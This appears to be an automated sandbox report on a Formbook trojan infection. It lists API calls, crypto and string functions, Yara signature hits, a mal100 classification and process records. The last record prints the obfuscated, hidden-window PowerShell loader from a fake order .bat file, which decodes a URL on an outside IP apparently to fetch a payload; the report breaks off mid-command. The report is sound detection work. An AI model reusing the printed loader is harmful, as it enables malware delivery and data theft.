Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662CA0 NtQueryInformationToken,LdrInitializeThunk,	23_2_04662CA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662D30 NtUnmapViewOfSection,LdrInitializeThunk,	23_2_04662D30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662D10 NtMapViewOfSection,LdrInitializeThunk,	23_2_04662D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662DF0 NtQuerySystemInformation,LdrInitializeThunk,	23_2_04662DF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662DD0 NtDelayExecution,LdrInitializeThunk,	23_2_04662DD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662EE0 NtQueueApcThread,LdrInitializeThunk,	23_2_04662EE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662E80 NtReadVirtualMemory,LdrInitializeThunk,	23_2_04662E80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662F30 NtCreateSection,LdrInitializeThunk,	23_2_04662F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662FE0 NtCreateFile,LdrInitializeThunk,	23_2_04662FE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662FB0 NtResumeThread,LdrInitializeThunk,	23_2_04662FB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046639B0 NtGetContextThread,LdrInitializeThunk,	23_2_046639B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662AF0 NtWriteFile,LdrInitializeThunk,	23_2_04662AF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662AD0 NtReadFile,LdrInitializeThunk,	23_2_04662AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662B60 NtClose,LdrInitializeThunk,	23_2_04662B60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662BE0 NtQueryValueKey,LdrInitializeThunk,	23_2_04662BE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	23_2_04662BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662BA0 NtEnumerateValueKey,LdrInitializeThunk,	23_2_04662BA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04663010 NtOpenDirectoryObject,	23_2_04663010
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662C00 NtQueryInformationProcess,	23_2_04662C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662CF0 NtOpenProcess,	23_2_04662CF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662CC0 NtQueryVirtualMemory,	23_2_04662CC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04663D70 NtOpenThread,	23_2_04663D70
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662D00 NtSetInformationFile,	23_2_04662D00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04663D10 NtOpenProcessToken,	23_2_04663D10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662DB0 NtEnumerateKey,	23_2_04662DB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662E30 NtWriteVirtualMemory,	23_2_04662E30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662EA0 NtAdjustPrivilegesToken,	23_2_04662EA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662F60 NtCreateProcessEx,	23_2_04662F60
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662FA0 NtQuerySection,	23_2_04662FA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662F90 NtProtectVirtualMemory,	23_2_04662F90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662AB0 NtWaitForSingleObject,	23_2_04662AB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04662B80 NtQueryInformationFile,	23_2_04662B80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C89A0 NtCreateFile,	23_2_003C89A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C8AD0 NtReadFile,	23_2_003C8AD0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C8B90 NtDeleteFile,	23_2_003C8B90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C8C10 NtClose,	23_2_003C8C10
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003C8D50 NtAllocateVirtualMemory,	23_2_003C8D50

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F2B1A6	2_2_00007FF848F2B1A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F2BF52	2_2_00007FF848F2BF52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0452F258	6_2_0452F258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0452FB28	6_2_0452FB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_0452EF10	6_2_0452EF10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_073D9350	6_2_073D9350
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2356D34C	20_2_2356D34C
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363A352	20_2_2363A352
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363132D	20_2_2363132D
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_236403E6	20_2_236403E6
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2358E3F0	20_2_2358E3F0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235C739A	20_2_235C739A
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23620274	20_2_23620274
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_236212ED	20_2_236212ED
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2359B2C0	20_2_2359B2C0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235852A0	20_2_235852A0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2364B16B	20_2_2364B16B
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2356F172	20_2_2356F172
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235B516C	20_2_235B516C
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23608158	20_2_23608158
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23570100	20_2_23570100
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2361A118	20_2_2361A118
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_236381CC	20_2_236381CC
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_236401AA	20_2_236401AA
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2358B1B0	20_2_2358B1B0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363F0E0	20_2_2363F0E0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_236370E9	20_2_236370E9
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235870C0	20_2_235870C0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2362F0CC	20_2_2362F0CC
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235A4750	20_2_235A4750
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23580770	20_2_23580770
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2357C7C0	20_2_2357C7C0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363F7B0	20_2_2363F7B0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_236316CC	20_2_236316CC
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2359C6E0	20_2_2359C6E0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23637571	20_2_23637571
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23580535	20_2_23580535
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2361D5B0	20_2_2361D5B0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23640591	20_2_23640591
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23632446	20_2_23632446
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23571460	20_2_23571460
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363F43F	20_2_2363F43F
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2362E4F6	20_2_2362E4F6
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363FB76	20_2_2363FB76
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363AB40	20_2_2363AB40
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235BDBF9	20_2_235BDBF9
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235F5BF0	20_2_235F5BF0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23636BD7	20_2_23636BD7
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2359FB80	20_2_2359FB80
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_23637A46	20_2_23637A46
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_2363FA49	20_2_2363FA49
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_235F3A6C	20_2_235F3A6C
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0016B010	20_2_0016B010
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0014E040	20_2_0014E040
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0014E260	20_2_0014E260
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0014C2D6	20_2_0014C2D6
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0014C2E0	20_2_0014C2E0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_0014C429	20_2_0014C429
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_001547F0	20_2_001547F0
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: 20_2_001547EC	20_2_001547EC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04621460	23_2_04621460
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E2446	23_2_046E2446
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EF43F	23_2_046EF43F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046DE4F6	23_2_046DE4F6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E7571	23_2_046E7571
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04630535	23_2_04630535
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046CD5B0	23_2_046CD5B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046F0591	23_2_046F0591
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0464C6E0	23_2_0464C6E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E16CC	23_2_046E16CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04630770	23_2_04630770
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04654750	23_2_04654750
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0462C7C0	23_2_0462C7C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EF7B0	23_2_046EF7B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E70E9	23_2_046E70E9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EF0E0	23_2_046EF0E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046DF0CC	23_2_046DF0CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046370C0	23_2_046370C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046FB16B	23_2_046FB16B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0466516C	23_2_0466516C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0461F172	23_2_0461F172
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046B8158	23_2_046B8158
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04620100	23_2_04620100
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046CA118	23_2_046CA118
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E81CC	23_2_046E81CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046F01AA	23_2_046F01AA
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0463B1B0	23_2_0463B1B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046D0274	23_2_046D0274
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046D12ED	23_2_046D12ED
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0464B2C0	23_2_0464B2C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046352A0	23_2_046352A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0461D34C	23_2_0461D34C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EA352	23_2_046EA352
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E132D	23_2_046E132D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046F03E6	23_2_046F03E6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0463E3F0	23_2_0463E3F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0467739A	23_2_0467739A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046A9C32	23_2_046A9C32
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04630C00	23_2_04630C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04620CF2	23_2_04620CF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EFCF2	23_2_046EFCF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046D0CB5	23_2_046D0CB5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E7D73	23_2_046E7D73
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04633D40	23_2_04633D40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E1D5A	23_2_046E1D5A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0463AD00	23_2_0463AD00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0462ADE0	23_2_0462ADE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0464FDC0	23_2_0464FDC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04648DBF	23_2_04648DBF
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04630E59	23_2_04630E59
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EEE26	23_2_046EEE26
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EEEDB	23_2_046EEEDB
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04639EB0	23_2_04639EB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04642E90	23_2_04642E90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046ECE93	23_2_046ECE93
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046A4F40	23_2_046A4F40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04672F28	23_2_04672F28
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04650F30	23_2_04650F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EFF09	23_2_046EFF09
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0463CFE0	23_2_0463CFE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04622FC8	23_2_04622FC8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EFFB1	23_2_046EFFB1
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04631F92	23_2_04631F92
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04632840	23_2_04632840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0463A840	23_2_0463A840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0469D800	23_2_0469D800
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046338E0	23_2_046338E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0465E8F0	23_2_0465E8F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046168B8	23_2_046168B8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04646962	23_2_04646962
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04639950	23_2_04639950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0464B950	23_2_0464B950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046329A0	23_2_046329A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046FA9A6	23_2_046FA9A6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046A3A6C	23_2_046A3A6C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EFA49	23_2_046EFA49
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E7A46	23_2_046E7A46
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046DDAC6	23_2_046DDAC6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046CDAAC	23_2_046CDAAC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_04675AA0	23_2_04675AA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0462EA80	23_2_0462EA80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EFB76	23_2_046EFB76
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046EAB40	23_2_046EAB40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046A5BF0	23_2_046A5BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0466DBF9	23_2_0466DBF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_046E6BD7	23_2_046E6BD7
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_0464FB80	23_2_0464FB80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B3070	23_2_003B3070
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003CB010	23_2_003CB010
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003AE040	23_2_003AE040
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003AE260	23_2_003AE260
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003AC2E0	23_2_003AC2E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003AC2D6	23_2_003AC2D6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003AC429	23_2_003AC429
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B47F0	23_2_003B47F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 23_2_003B47EC	23_2_003B47EC

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04677E54 appears 96 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 0469EA12 appears 86 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 0461B970 appears 268 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 04665130 appears 36 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 046AF290 appears 105 times
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: String function: 2356B970 appears 143 times
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: String function: 235C7E54 appears 56 times
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: String function: 235FF290 appears 43 times
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Code function: String function: 235EEA12 appears 56 times

Yara signature match

Source: amsi32_5616.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000017.00000002.3323646840.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.3324620277.0000000001030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.3323530542.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.3322802619.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.2954253289.0000000023890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.3324975531.00000000022C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.2909221292.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2700, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5616, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@41/10@2/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Specificerings.Lit

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2700
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5616

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ordine_doc_419024001904.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. 